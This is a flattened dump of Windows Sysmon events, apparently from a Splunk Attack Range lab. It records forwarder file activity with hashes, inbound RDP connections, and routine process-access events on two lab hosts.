Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DF7E92BFC81A610DCD1A0B0FF9715CA,SHA256=63CA85DBA9F46F43E0CE73154C61A9D2F02B8982692B8D36884D74145C1BB3A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295736Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:06.537{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\db\data.safe.binMD5=BE83B7FDCD39A8AEC3D73A9529F83273,SHA256=1A0208E6E328081330EBBA33D99AF0041C959711D837A7AC2E1099E29BDB53EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295735Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:06.152{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C0FBB4790706EF89425491A24BA00CA,SHA256=2B617A5D5AD883489D5946C486118E45EB6BFC2A887FFCBA7DEDDF563810FB6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295737Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:07.167{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD11DD4632795AF92706AE6C7C204E89,SHA256=E853F265046960F572F9CB88BC2F458657F52E488708078F7928EDBAFB00E17B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219890Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:07.473{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C37F5C6F5A5C065761907A49D30C435A,SHA256=F3CDA97F2EC05F45B613E015F7EC5D431971AAECF1365CDE0EC8725EFAC2F28F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295738Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:08.182{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59F47FD0E3A26D77ECE82383BBACA0EE,SHA256=849B5EF709C61F98DAE380A88A3611EE209DBBBDFBF4A772D84DBB4FC7F45AD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219894Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:08.535{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C867B6AFFB1C9A5CCA0D1F7FB4B31F85,SHA256=55336150276626EA62BEDCBAC7AB6059BF9C454855733B480E4C28BE73A171DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219893Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:08.301{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0394D7B11AAE0336DD04F101539C9185,SHA256=13973B0571F74C1708F0486CC33956D3387182FD09C1B22960ABFC9F8AF06B48,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219892Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:05.600{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx63945-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 354300x8000000000000000219891Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:05.594{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51545-false10.0.1.12-8000- 23542300x8000000000000000219895Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:09.551{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43D7B1A2F1F20BB6CE24BE0039211081,SHA256=BD4877EAFA3B7D85C05912F628B876011AE51C5C49677EFA0357C1BEC5027DD0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295740Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:07.540{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49272-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000295739Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:09.236{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA5CD2FEFCD3B23FE28B92D27BC02CFE,SHA256=8E472EEE4D23FDBA2300E441FCDD6ACBCB829B495128C02A1E6680C69F7FAD5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219896Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:10.598{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=530D18A4A529B9C48544678CB82666AE,SHA256=38B07EB71D83523705605AD2DED04A6E59CF34142DF57FC0E004FCA15127A5DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295741Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:10.251{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=297D6EA4A401300E3D85DD5FDBD0F013,SHA256=C54D0F2E74B7EC7BE4943697AA3BCB7A9CD27FFBEA01DB3CD497A3DE9C673BA3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219899Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:11.832{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1ACE173818B88A27D00C92F76716736D,SHA256=5BED7DAE140E8607DAE1BA9454BE8CA840C4CAE5ACA8FF3F2A3E6B23F5C750BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219898Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:11.613{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4CE04C9C584E3801736FF6A8BBC9BC68,SHA256=BC4652D0839D6D23FE2D0C8D03D563CDD156B4EE9A1A62B92F36191C89A5A694,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295742Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:11.266{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5269AA2B654308DC0856C0A357A6C28,SHA256=832EBCE668C0CCDAEAF97AEB5BB0A5509BC440ECB43F5B9FE4D9A3CD7D906A05,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219897Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:08.778{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx53604-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219900Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:12.629{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C540719DCDB0CECDFDACCC36852D2FB,SHA256=CE9C22454894CA0049906EC043677DB1DAF677A9329E7FE2E2E91AB9E236CFE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295743Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:12.334{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=739B744C406F69720AB348CBBEB3E879,SHA256=BD7EBF0042E622C3C458E91878A3CC4ED79AD788576B91E71583A179A0B44937,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219901Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:13.676{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08E22A51D452A3C81549B1AAFE379573,SHA256=9628B0BE99C67C60B56010ECEE4835396DDA2485450DFB408414B0C8F5D38892,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295744Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:13.349{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=199522958A12CD9765FA4E045591D064,SHA256=CA62815FE436F90DB24524299668ED9D67F53A5BE53BCF628DEE1BBB37CE17C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219904Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:14.707{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5D2E07B0F90D1CB921C64101DC446F3,SHA256=84D446AE7E5BE48DF39FF9CD9D5862EF571154B88087785B5B3AF3B034803E4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295745Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:14.364{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7CAC8C71F4CF4657FA060B48CBBC3F1,SHA256=6FC98F182D0EE36C801140F11D065453DAF0A540318CEFB329DDE5FB02B3D23E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219903Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:12.317{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx52945-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 354300x8000000000000000219902Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:11.625{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51546-false10.0.1.12-8000- 23542300x8000000000000000219905Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:15.910{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A61FBE6F18E4FD6202BCA8AFD94F9D4,SHA256=EEFDF0818D28777046EFD7DB1F7C01C811DAB41EB2CFE57DA69002A6E1C2741E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295747Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:15.365{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61E16FFB846268AF0E01819FCC339693,SHA256=94DD89EC383E5F8A818A8429A1E6F1A8B1CC76DBFD8904C13F3FE085BBEA6822,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000295746Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:12.688{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49273-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000219907Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:16.973{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE2F60D23E4AFE9D45487F9845D985AA,SHA256=35ECB4E27880D0F9D722476ABC6BF033C95A030F22F6759A4266E891593EDFFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295748Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:16.380{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E697CCA68BC633C079383A3B11E07E5,SHA256=0D93692A6084B4D5D6CE3BB83CF53E8DB39202775CA9584BDAEE49CEDB5C8BC5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219906Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:16.113{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=70F1F0C2438D828BF2A4580D809C2699,SHA256=59FF47DEF424D179E790A051AA0AD2884C9512C90383E74CB106FE3DD14E964A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295749Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:17.395{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E79980493BDCB22F06001F1AB3C0B63,SHA256=8A1417985472DB6BBA53F99F182C8AFEF0D3EBB19277F5FFC221D16C4703A3D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000295750Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:18.417{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F8D11383E9537F373D2CA125A2DED88,SHA256=26665D9AB38177114E14F13F8A82B56E47DC445AAFAAAFBA52D6D8726C674AC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219908Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:18.035{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8AD980E0637D21D8A74C2660035FFC06,SHA256=2AE21088A08E56428296EB166656E44C823F8FF8449E71CD4965613F9D0A000A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295760Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:19.822{C8EA50B7-15A3-6216-D306-000000003802}51886784C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000295759Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:19.432{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93090D2EB39F76F3C04452DA21C87D0B,SHA256=B95BFE8BC9A5315000EF230E5F0A9CC7AE126F434FED75B7A660476EC34CA0E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219912Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:19.879{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=69A04C28CA10C01698EFBEBEBBEBF4D0,SHA256=7643148D7DBB6697B6F30579E9D53DE6D4E233065C394DEDF769F3F200036765,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219911Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:17.595{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51547-false10.0.1.12-8000- 354300x8000000000000000219910Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:17.097{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx54495-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219909Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:08:19.207{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=876D192456A9A9D6345839C7F25012BE,SHA256=48D33308B9D61ED5B4E6A41C3F935D2CF12841D53CC8143544CCAD9AFF914281,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295758Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:19.263{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-15A3-6216-D306-000000003802}5188C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295757Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:19.248{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295756Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:19.248{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295755Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:19.248{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295754Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:08:19.248{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 